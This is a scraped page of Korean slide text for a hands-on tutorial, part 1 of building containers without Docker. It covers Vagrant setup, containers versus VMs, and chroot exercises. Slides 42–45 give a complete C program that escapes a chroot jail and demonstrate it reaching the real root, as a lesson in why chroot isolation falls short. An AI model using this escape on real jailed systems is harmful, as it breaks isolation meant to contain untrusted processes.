리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
리얼리눅스 제 1 회 세미나: "리눅스, 제대로 알고 코딩하자!"
 
[오픈소스컨설팅]Docker on Kubernetes v1
[오픈소스컨설팅]Docker on Kubernetes v1[오픈소스컨설팅]Docker on Kubernetes v1
[오픈소스컨설팅]Docker on Kubernetes v1
 
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 DockerXECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
XECon2015 :: [1-5] 김훈민 - 서버 운영자가 꼭 알아야 할 Docker
 
[1A6]Docker로 보는 서버 운영의 미래
[1A6]Docker로 보는 서버 운영의 미래[1A6]Docker로 보는 서버 운영의 미래
[1A6]Docker로 보는 서버 운영의 미래
 
Docker 사용가이드 public v0.1
Docker 사용가이드 public v0.1Docker 사용가이드 public v0.1
Docker 사용가이드 public v0.1
 
Docker.소개.30 m
Docker.소개.30 mDocker.소개.30 m
Docker.소개.30 m
 
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
[오픈소스컨설팅]쿠버네티스를 활용한 개발환경 구축
 
망고100 보드로 놀아보자 11
망고100 보드로 놀아보자 11망고100 보드로 놀아보자 11
망고100 보드로 놀아보자 11
 
우분투에 시스템콜 추가하기
우분투에 시스템콜 추가하기우분투에 시스템콜 추가하기
우분투에 시스템콜 추가하기
 
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
[H3 2012] 내컴에선 잘되던데? - vagrant로 서버와 동일한 개발환경 꾸미기
 
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
내컴에선 잘되던데? Vagrant로 서버와 동일한 개발환경 꾸미기
 
[17.01.19] docker introduction (Korean Version)
[17.01.19] docker introduction (Korean Version)[17.01.19] docker introduction (Korean Version)
[17.01.19] docker introduction (Korean Version)
 
[Nomad connection]docker seminar 15.10.08
[Nomad connection]docker seminar 15.10.08[Nomad connection]docker seminar 15.10.08
[Nomad connection]docker seminar 15.10.08
 
cross compile
cross compilecross compile
cross compile
 
Virtual Development Environment Setting
Virtual Development Environment SettingVirtual Development Environment Setting
Virtual Development Environment Setting
 
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
[오픈소스컨설팅]Docker on Cloud(Digital Ocean)
 
Kafka slideshare
Kafka slideshareKafka slideshare
Kafka slideshare
 
docker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
docker on GCE ( JIRA & Confluence ) - GDG Korea Clouddocker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
docker on GCE ( JIRA & Confluence ) - GDG Korea Cloud
 
Deploying Hyperledger Fabric on Kubernetes.pptx
Deploying Hyperledger Fabric on Kubernetes.pptxDeploying Hyperledger Fabric on Kubernetes.pptx
Deploying Hyperledger Fabric on Kubernetes.pptx
 

도커없이 컨테이너 만들기 1편

  • 1. 도커 없이 컨테이너 만들기 1편 Sam.0 실습과 함께 완성해보는
  • 2. 실습은 . . . ● 맥 환경에서 VirtualBox + Vagrant 기반으로 준비되었습니다 ○ 맥 이외의 OS 환경도 괜찮습니다만 ○ 원활한 실습을 위해서 ○ “VirtualBox or VMware + Vagrant”는 권장드립니다. ● 실습환경 구성을 위한 Vagrantfile을 제공합니다. 실습을 위한 사전 준비 사항
  • 3. Vagrantfile ● 오른쪽의 텍스트를 복사하신 후 ● 로컬에 Vagrantfile로 저장하여 사용하면 됩니다. ● vagrant 사용법은 공식문서를 참고해 주세요 https://www.vagrantup.com/docs/i ndex 실습을 위한 사전 준비 사항 BOX_IMAGE = "bento/ubuntu-18.04" HOST_NAME = "ubuntu1804" $pre_install = <<-SCRIPT echo ">>>> pre-install <<<<<<" sudo apt-get update && sudo apt-get -y install gcc && sudo apt-get -y install make && sudo apt-get -y install pkg-config && sudo apt-get -y install libseccomp-dev && sudo apt-get -y install tree && sudo apt-get -y install jq && sudo apt-get -y install bridge-utils echo ">>>> install go <<<<<<" curl -O https://storage.googleapis.com/golang/go1.15.7.linux-amd64.tar.gz > /dev/null 2>&1 && tar xf go1.15.7.linux-amd64.tar.gz && sudo mv go /usr/local/ && echo 'PATH=$PATH:/usr/local/go/bin' | tee /home/vagrant/.bash_profile echo ">>>>> install docker <<<<<<" sudo apt-get -y install apt-transport-https ca-certificates curl gnupg-agent software-properties-common > /dev/null 2>&1 && sudo curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - && sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" && sudo apt-get update && sudo apt-get -y install docker-ce docker-ce-cli containerd.io > /dev/null 2>&1 SCRIPT Vagrant.configure("2") do |config| config.vm.define HOST_NAME do |subconfig| subconfig.vm.box = BOX_IMAGE subconfig.vm.hostname = HOST_NAME subconfig.vm.network :private_network, ip: "192.168.104.2" subconfig.vm.provider "virtualbox" do |v| v.memory = 1536 v.cpus = 2 end subconfig.vm.provision "shell", inline: $pre_install end end
  • 4. # sudo -Es 실습 계정 (root) # cd /tmp 실습 폴더 vagrant + virtual vm ubuntu 18.04 docker 20.10.5 * 도커 이미지 다운로드 및 컨테이너 비교를 위한 용도로 사용합니다. 기타 설치된 툴 ~ tree, jq, brctl, … 등 실습을 위한 툴 Vagrantfile 제공 환경 실습을 위한 사전 준비 사항
  • 6. 도커 ? https://docs.docker.com/get-started/overview/ 회사명 이면서 제품명 → 컨테이너를 다루는 플랫폼
  • 7. 컨테이너 ? 격리된 환경과 통제된 리소스에서 실행되는 프로세스 그룹 호스트 안에 따로 한 살림 차려준달까 시스템리소스 (cpu, mem, ..) processes processes 집 안의 집 ~ “컴퓨터 안 의 컴퓨터” https://jessicagreben.medium.com/what-is-the-difference-between-a-process-a-container-and-a-vm-f36ba0f8a8f7
  • 8. 컨테이너? VM 보다 가볍다 Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App Strong Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container Weak Isolation 컨테이너 환경
  • 9. 컨테이너? VM 보다 가볍다 왜 ? Guest OS가 없다 (호스트 OS를 공유) Infrastructure OS Hypervisor Guest OS Guest OS Guest OS App App App 스트롱 ~ Isolation 가상머신(VM) 환경 Infrastructure OS Container Engine App App App container container container 약한 Isolation 컨테이너 환경
  • 10. 컨테이너 vs VM https://artistdata.tistory.com/5 최대소수연산(sysbench) 소요시간 비교 압축 성능 비교 (LZMA benchmark) for CPU performance RAM Speed 비교 디스크 I/O 성능비교 (IOzone benchmark) 성능비교 ~ 컨테이너가 빠름 빠름 ~
  • 11. 1979 chroot 2000 Jails 2013 2002 mount ns 2006 uts, ipc ns 2009 net ns 2012 user ns LXC (LinuX Containers) 2008 pid ns, cgroup 컨테이너의 역사 컨테이너의 시작은 1979년 chroot 로 부터 ~
  • 12. chroot ? change root directory ‘ / ’ 리눅스 파일시스템은 모든 파일 및 디렉토리가 “root (/)” 로 부터 시작된다. bin boot chroot etc lib proc usr var / (root filesystem)
  • 13. chroot ? change root directory ‘ / ’ 원격 유저(FTP 등)를 특정 디렉토리 경로에 가두기 위한 용도 등으로 사용됨 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail Hacker 따라서.. 특정 디렉토리 경로를 root로 지정할 수 있으면 해당 경로에 프로세스를 가둘 수 있다는 점에 착안 ~
  • 14. chroot 실습 chroot로 컨테이너를 만들어 보자 bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail
  • 15. chroot 실습 chroot는 새로운 경로(NEWROOT)와 실행할 커맨드를 인자로 받습니다. # man chroot ~ 커맨드를 따로 지정하지 않으면 default 커맨드 (/bin/sh) 로 동작합니다.
  • 16. # mkdir new-root # chroot new-root /bin/bash new-root 폴더를 만들고, chroot를 해봅시다 chroot 실습
  • 17. # chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 ~ chroot의 커맨드(/bin/bash)는 new-root 경로를 기준으로 합니다 즉, 실행할 커맨드가 경로에 없다고 에러 빽 ~
  • 18. chroot 실습 # which bash /bin/bash # mkdir -p new-root/bin # cp /bin/bash new-root/bin /bin/bash 파일을 new-root/bin 으로 복사해주세요
  • 19. # chroot new-root /bin/bash chroot: failed to run command ‘/bin/bash’: No such file or directory chroot 실습 왜 또 ~ ㅠ 다시 실행해 보지만 …
  • 20. # ldd /bin/bash ldd prints the shared libraries required 참고) man ldd (list dynamic dependencies) /bin/bash에서 실행 시 참조하는 라이브러리들이 있었군요 chroot 실습
  • 21. chroot 실습 bash 실행을 위한 라이브러리도 복사해주세요 한땀한땀 ~ # mkdir new-root/lib # cp /lib/x86_64-linux-gnu/libtinfo.so.5 new-root/lib/ # cp /lib/x86_64-linux-gnu/libdl.so.2 new-root/lib/ # cp /lib/x86_64-linux-gnu/libc.so.6 new-root/lib/ # mkdir new-root/lib64 # cp /lib64/ld-linux-x86-64.so.2 new-root/lib64/ Q) linux-vdso.so.1 은 왜 복사안해요 ? A) *-vdso 는 커널레벨에서제공되는 공유 라이브러리입니다. 참고) man vdso (virtual dynamic shared object)
  • 22. chroot 실습 # chroot new-root /bin/bash bash-4.4# 성공 ~ 오.. 뭔가 다른 터미널에 들어온 기분이네요
  • 23. chroot 실습 But … 세상일이라는게 호락호락 하지 않네요 ...
  • 24. chroot 실습 ls 명령어도 복사해 넣어봅시다 먼저, exit 를 입력하여 chroot로 실행된 프로세스를 종료합니다 bash-4.4# exit #
  • 25. chroot 실습 ls 명령어도 복사해 넣어봅시다 # cp /bin/ls new-root/bin # cp /lib/x86_64-linux-gnu/libselinux.so.1 . . . 이하 생략 . . . 직접 하실 수 있겠지요 ? 앞서 bash 복사와 동일합니다 :-) 한땀한땀 ~ cp 해주세요
  • 26. chroot 실습 다시 chroot 로 new-root의 bash를 실행해 보세요 # chroot new-root /bin/bash bash-4.4# 이번에는 ls 도 동작합니다
  • 27. chroot 실습 ls 로 확인해보니 “/” (root) 가 달라졌습니다 원래 root (“/”)
  • 28. bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Hacker In Jail chroot 실습 그리고, root 밖으로 벗어날 수 없습니다 원래 root (“/”)
  • 29. chroot 실습 cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요 그렇습니다 . 사용하고 싶은 명령어는 한땀한땀 넣어주어야 합니다. bash와 라이브러리들을 복사해온 것 처럼 말이죠
  • 30. chroot 실습 new-root copy copy copy cat, mkdir, ps, … 원하는 프로그램을 복사하고 chroot 에서 실행해 보세요
  • 31. chroot 실습 필요한 프로그램들은 이처럼 한땀한땀 복사해 넣어야 합니다. 저는 욕심을 좀 부려보았습니다. ps 를 해보기 위해 mount 까지 넣어보았습니다. new-root
  • 32. 그것이 바로 이미지(image) 입니다 :-) 흔히들, “도커 이미지”라고 부르는 그것 말이죠. 일종의 tarball 이라고 생각하면 됩니다. nginx image tarball 누군가 미리 필요한 것들을 모아 둔 것을 가져다 쓰면 편하겠죠 ? chroot + 이미지 실습
  • 33. 말 나온김에 이미지를 가져와 볼까요 ? nginx-root # cd /tmp # mkdir nginx-root 일단, /tmp 에 “nginx-root” 라는 새로운 폴더를 하나 만들어 줍시다. chroot + 이미지 실습
  • 34. 새로 만든 nginx-root 라는 경로에 nginx 이미지를 풀어줄 건데요 이 명령은 아래의 단계를 수행합니다. 1. 이미지 저장소로 부터 nginx:latest 이미지를 가지고 와서 2. tarball로 export (압축) 한 것을 3. nginx-root 경로에 풀어줍니다. 말 나온김에 이미지를 가져와 볼까요 ? nginx-root nginx image tarball # docker export $(docker create nginx:latest) | tar -C nginx-root -xvf - chroot + 이미지 실습
  • 35. 이처럼 필요한 이미지를 풀어놓은 경로를 chroot 를 해주면 ~ # chroot nginx-root /bin/sh # ls 명령도 동작을 하네요 ~ 누군가 필요한 것들을 잘 모아 놓았습니다. chroot + 이미지 실습
  • 36. nginx image tarball 의 내용과 동일합니다 … 압축을 풀어놓은 그대로죠 ㅎㅎ nginx image tarball = 동일 chroot + 이미지 실습
  • 37. nginx 도 한번 실행해 볼까요? chroot + 이미지 실습
  • 38. 터미널창을 하나 더 열어서 실제 접속이 되는지 확인해 보세요 # curl localhost 터미널 #2 접속이 잘 되었다면 성공 ~ chroot + 이미지 실습
  • 39. 지금까지 nginx 이미지와 chroot를 이용하여 nginx 웹서버를 실행해 보았습니다 nginx image tarball nginx-root “실제 컨테이너 처럼” 프로그램 실행에 필요한 파일들을 모아놓고 해당 경로를 root로 하여 프로세스를 실행하는 것을 재현해 보았는데요 chroot + 이미지 실습
  • 40. 그런데 말입니다 … chroot에는 치명적인 문제가 있습니다 new-root chroot chroot 문제점
  • 41. chroot 문제점 그것은 바로 ~~~ 탈옥이 가능하다는 점입니다 … bin boot chroot etc lib proc usr var / (root filesystem) bin lib home usr / (Fake root) Angry Hacker
  • 42. chroot 에서 탈출해보자 탈옥 코드 # vi escape_chroot.c #include <sys/stat.h> #include <unistd.h> int main(void) { mkdir(".out", 0755); chroot(".out"); chdir("../../../../../"); chroot("."); return execl("/bin/sh", "-i", NULL); }
  • 43. chroot 에서 탈출해보자 탈옥 코드를 컴파일하고 new-root에 복사합니다 # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root /bin/bash bash-4.4# ls / change root 는 잘됐군 ~
  • 44. chroot 에서 탈출해보자 escape_chroot 를 실행하면 ... # gcc -o new-root/escape_chroot escape_chroot.c # chroot new-root bash-4.4# ls / bash-4.4# ./escape_chroot # ls / bin escape_chroot lib usr / (Fake root) 탈옥
  • 45. 탈옥에 성공했다는 것은 … 실제 루트 (/)를 취득했다는 얘기가 되겠죠 ㅠ.ㅠ chroot 에서 탈출해보자 bin escape_chroot lib usr / (Fake root)
  • 46. chroot 문제점 탈옥 말고도 … chroot 가 가지고 있는 문제점은 많습니다. ~ 호스트와의 격리 문제, 리소스 제한, 보안 ... 앞으로 이러한 문제들 하나하나 해결해 가면서 함께 완전한 컨테이너를 만들어 보시죠 :-)
  • 47. 2편 예고 다음 편에서는 chroot 의 탈옥문제를 해결하는 방법으로써 pivot_root에 대해 다루도록 하겠습니다
  • 48. END